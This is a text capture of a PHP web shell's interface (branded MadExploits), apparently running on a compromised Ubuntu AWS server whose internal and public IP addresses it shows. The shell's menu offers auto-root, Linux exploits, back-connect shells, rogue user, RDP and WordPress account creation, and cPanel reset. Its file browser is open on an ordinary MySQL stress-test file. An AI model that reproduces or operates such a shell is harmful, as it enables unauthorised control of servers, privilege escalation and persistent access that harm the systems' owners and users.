Linux ip-172-26-2-223 5.4.0-1018-aws #18-Ubuntu SMP Wed Jun 24 01:15:00 UTC 2020 x86_64
Apache
: 172.26.2.223 | : 3.128.205.62
Cant Read [ /etc/named.conf ]
8.1.13
www
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
BLACK DEFEND!
README
+ Create Folder
+ Create File
/
www /
server /
mysql /
mysql-test /
suite /
stress /
t /
[ HOME SHELL ]
Name
Size
Permission
Action
ddl_archive.test
1.39
KB
-rw-r--r--
ddl_csv.test
1.33
KB
-rw-r--r--
ddl_innodb.test
1.36
KB
-rw-r--r--
ddl_memory.test
1.23
KB
-rw-r--r--
ddl_myisam.test
1.29
KB
-rw-r--r--
wrapper.test
784
B
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : ddl_memory.test
######## t/ddl_memory.test ###### # # Stress the storage engine MEMORY with CREATE/DROP TABLE/INDEX # # Please look for details within include/ddl1.inc. # # Creation of this test: # 2007-07-04 mleich # # Storage engine to be used in CREATE TABLE let $engine_type= MEMORY; if (`SELECT $PS_PROTOCOL + $SP_PROTOCOL + $CURSOR_PROTOCOL + $VIEW_PROTOCOL > 0`) { --skip Test requires: ps-protocol/sp-protocol/cursor-protocol/view-protocol disabled } let $run= `SELECT '$BIG_TEST' = '1'`; if ($run) { # A run started with "--big-test" should be allowed to consume more time. # Rough intended runtime per subtest variant in seconds let $runtime = 5; # number of rounds till we look at the clock again let $loop_size= 100; } if (!$run) { let $runtime = 1; let $loop_size= 20; } ##### Some preparations needed for the ddl*.inc scripts --source suite/stress/include/ddl.pre --source suite/stress/include/ddl1.inc --source suite/stress/include/ddl2.inc --source suite/stress/include/ddl3.inc --source suite/stress/include/ddl4.inc --source suite/stress/include/ddl5.inc --source suite/stress/include/ddl6.inc --source suite/stress/include/ddl7.inc --source suite/stress/include/ddl8.inc ##### Cleanup --source suite/stress/include/ddl.cln
Close